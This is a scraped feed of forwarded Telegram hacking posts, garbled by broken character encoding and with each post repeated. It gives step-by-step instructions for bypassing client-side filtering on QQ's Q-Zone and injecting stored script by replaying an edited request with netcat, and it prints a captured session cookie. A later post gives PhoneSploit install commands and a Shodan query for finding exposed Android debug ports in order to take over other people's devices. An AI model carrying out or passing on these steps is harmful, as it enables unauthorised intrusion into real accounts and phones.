Forwarded from PRIVATE UNDERCODE
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Analysis of Q-Zone cross-site vulnerability
youtube.com/undercode
1_ -Zone filters user input
After entering the Q-Zone, click "Settings β Space Settings βq Space Name" in turn, where the display name of the space can be modified. If we write an executable script code, as long as the filtering is not strict, it will also be saved in the home page, and the execution code is called to attack the browser. Let's first test whether we can write cross-site scripts in this input box:
2) When entering the above code "<script> alert (" test ") </ script>" in the "Input Space Name" input box, I found that the length of the input characters was limited in the input box, and only 24 characters could be entered in total. And when we enter the code of the permitted length, after clicking Submit, a dialog box of "Please do not include" <> etc. characters in the input "will pop up. It seems that Q-Zone filters the user's input.
3) Check the input filtering method of Q-Zone
Click "View β Source File" on the Q-Zone page. At the beginning of the code segment, you can see the following code segment:
if (! checkFormValue (form1)) return false;
len = StrLenOfAscii (form1.spacename.value) / 2;
if (len> 12) {
4) Users with a little ASP programming foundation, I believe they can understand this code? Through the "StrLenOfAscii ()" function in the code, the length of the user input data ASC β ‘ code is obtained, and the value is assigned to the len variable after dividing by 2. If the following code detects that the length of the len variable is greater than 12, it prompts that the name is too long. The most important one is the previous sentence: "if (! CheckFormValue (form1)) return false", where the "checkFormValue ()" function can obviously be inferred to detect whether the input data contains special characters. When it is detected that the data contains filtered characters, the aforementioned dialog box pops up.
5) Through analysis, we can be sure that Q-Zone filters the user input data on the client side.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Analysis of Q-Zone cross-site vulnerability
youtube.com/undercode
1_ -Zone filters user input
After entering the Q-Zone, click "Settings β Space Settings βq Space Name" in turn, where the display name of the space can be modified. If we write an executable script code, as long as the filtering is not strict, it will also be saved in the home page, and the execution code is called to attack the browser. Let's first test whether we can write cross-site scripts in this input box:
2) When entering the above code "<script> alert (" test ") </ script>" in the "Input Space Name" input box, I found that the length of the input characters was limited in the input box, and only 24 characters could be entered in total. And when we enter the code of the permitted length, after clicking Submit, a dialog box of "Please do not include" <> etc. characters in the input "will pop up. It seems that Q-Zone filters the user's input.
3) Check the input filtering method of Q-Zone
Click "View β Source File" on the Q-Zone page. At the beginning of the code segment, you can see the following code segment:
if (! checkFormValue (form1)) return false;
len = StrLenOfAscii (form1.spacename.value) / 2;
if (len> 12) {
4) Users with a little ASP programming foundation, I believe they can understand this code? Through the "StrLenOfAscii ()" function in the code, the length of the user input data ASC β ‘ code is obtained, and the value is assigned to the len variable after dividing by 2. If the following code detects that the length of the len variable is greater than 12, it prompts that the name is too long. The most important one is the previous sentence: "if (! CheckFormValue (form1)) return false", where the "checkFormValue ()" function can obviously be inferred to detect whether the input data contains special characters. When it is detected that the data contains filtered characters, the aforementioned dialog box pops up.
5) Through analysis, we can be sure that Q-Zone filters the user input data on the client side.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
YouTube
UNDERCODE
FREE AI & CYBERSECURITY TRICKS & MALWARE ANALYSIS HACKS, DAILY MEMES & MINDβBENDING TECH MYSTERIESβ¦ ALL ON UNDERCODE!
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 β https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsβ¦
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 β https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsβ¦
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Exploitation of Q-Zone cross-site vulnerability :
t.me/UndercodeTesting
1) Now that Q-Zone filters the user input data on the client, it leaves us with an opportunity to use. We can bypass the limitations of the client and directly modify the input data for submission. But Q-Zone imposes another restriction on the data submitted by users, that is, it is not allowed to submit from external sites, and the HTML files we save here cannot submit data normally. Therefore, we must think of another way to modify the submitted data.
2) We first run a software called WSockExpert. After running WSockExpert, click the "Open" button on the toolbar to display the current process list. If you open the Q-Zone with the QQ panel, then select "QQ.exe β ** 's home" in the process list; if you open the Q-Zone with IE, you can find the corresponding process in the IE process and confirm Then click the "Open" button to start monitoring the data exchanged with the website server.
3) Return to the Q-Zone web page, enter any characters that can be submitted, such as "1234567890" at the "space name", and then click "Submit" to return to the WSockExpert, click on the third row near the "send" Data column, you can see the content of the submitted data:
4) "Content-Length: 20
Cookie: pvid = 1575119174; portalentryurl = http: //vnet.qq.com/hn/; zzpaneluin = 41346583; zzpanelkey ββ= 753923CF61AB165D613966B82F8E7F6B2D9E5A681CE7507E9A677086A89BC6DD; clientver = 1305; skey =; uin = g
spacename = 1234567890 "
"Cookie" is the content of the cookie, which contains the user authentication; and "spacename = 1234567890" is the space name data we submitted; the previous "Content-Length: 20" is the length of the submitted data. In the data, you can also see "Referer: http://q-zone.qq.com/cgi-bin/user/cgi_show_spacename", which is the address of the server page we want to submit.
3) Modify the submitted data
After copying all the submitted data in the following window, save it as a 1.TXT file, and change "spacename = 1234567890" in the code to: "spacename = <script> alert (" test ") </ script>", "Content-Length: 20" changed to "Content-Length: 40"
4) Now as long as we submit these data to the server, we can bypass the client's data filtering, which requires another tool called NC.
Copy the "1.txt" saved above to the same folder as "nc.exe", open the command prompt window in the Windows system, enter the folder where NC.exe is located at the command line, enter "nc- vv q-zone.qq.com 80 <1.txt ", after the command is executed, we will submit our modified data to the remote server.
> We can change "Test" to any Chinese, but we need to convert it to IE code first. For example, the IE code for "Test" is "% B2% E2% CA% D4". .
5) Examine the results of code execution
Open our Q-Zone, and a prompt window will pop up automatically. It means that we have successfully inserted the "<script> alert (" test ") </ script>" code in the remote webpage! At the same time, on the page for modifying the space name, you can see the originally restricted space name that has been submitted for modification.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Exploitation of Q-Zone cross-site vulnerability :
t.me/UndercodeTesting
1) Now that Q-Zone filters the user input data on the client, it leaves us with an opportunity to use. We can bypass the limitations of the client and directly modify the input data for submission. But Q-Zone imposes another restriction on the data submitted by users, that is, it is not allowed to submit from external sites, and the HTML files we save here cannot submit data normally. Therefore, we must think of another way to modify the submitted data.
2) We first run a software called WSockExpert. After running WSockExpert, click the "Open" button on the toolbar to display the current process list. If you open the Q-Zone with the QQ panel, then select "QQ.exe β ** 's home" in the process list; if you open the Q-Zone with IE, you can find the corresponding process in the IE process and confirm Then click the "Open" button to start monitoring the data exchanged with the website server.
3) Return to the Q-Zone web page, enter any characters that can be submitted, such as "1234567890" at the "space name", and then click "Submit" to return to the WSockExpert, click on the third row near the "send" Data column, you can see the content of the submitted data:
4) "Content-Length: 20
Cookie: pvid = 1575119174; portalentryurl = http: //vnet.qq.com/hn/; zzpaneluin = 41346583; zzpanelkey ββ= 753923CF61AB165D613966B82F8E7F6B2D9E5A681CE7507E9A677086A89BC6DD; clientver = 1305; skey =; uin = g
spacename = 1234567890 "
"Cookie" is the content of the cookie, which contains the user authentication; and "spacename = 1234567890" is the space name data we submitted; the previous "Content-Length: 20" is the length of the submitted data. In the data, you can also see "Referer: http://q-zone.qq.com/cgi-bin/user/cgi_show_spacename", which is the address of the server page we want to submit.
3) Modify the submitted data
After copying all the submitted data in the following window, save it as a 1.TXT file, and change "spacename = 1234567890" in the code to: "spacename = <script> alert (" test ") </ script>", "Content-Length: 20" changed to "Content-Length: 40"
4) Now as long as we submit these data to the server, we can bypass the client's data filtering, which requires another tool called NC.
Copy the "1.txt" saved above to the same folder as "nc.exe", open the command prompt window in the Windows system, enter the folder where NC.exe is located at the command line, enter "nc- vv q-zone.qq.com 80 <1.txt ", after the command is executed, we will submit our modified data to the remote server.
> We can change "Test" to any Chinese, but we need to convert it to IE code first. For example, the IE code for "Test" is "% B2% E2% CA% D4". .
5) Examine the results of code execution
Open our Q-Zone, and a prompt window will pop up automatically. It means that we have successfully inserted the "<script> alert (" test ") </ script>" code in the remote webpage! At the same time, on the page for modifying the space name, you can see the originally restricted space name that has been submitted for modification.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦EXPLOIT
> updated - Using open Adb ports we can exploit a device
termux(root)-linuxβ
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/Zucccs/PhoneSploit
2) extract adb.rar to the phonesploit directory
3) cd PhoneSploit
4) pip install colorama
5) python2 main.py
6) IF ADB NOT FOUND
sudo apt update sudo apt install android-tools-adb android-tools-fastboot
7) Using open Adb ports we can exploit a device
you can find open ports here https://www.shodan.io/search?query=android+debug+bridge+product%3AβAndroid+Debug+Bridgeβ
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦EXPLOIT
> updated - Using open Adb ports we can exploit a device
termux(root)-linuxβ
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/Zucccs/PhoneSploit
2) extract adb.rar to the phonesploit directory
3) cd PhoneSploit
4) pip install colorama
5) python2 main.py
6) IF ADB NOT FOUND
sudo apt update sudo apt install android-tools-adb android-tools-fastboot
7) Using open Adb ports we can exploit a device
you can find open ports here https://www.shodan.io/search?query=android+debug+bridge+product%3AβAndroid+Debug+Bridgeβ
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β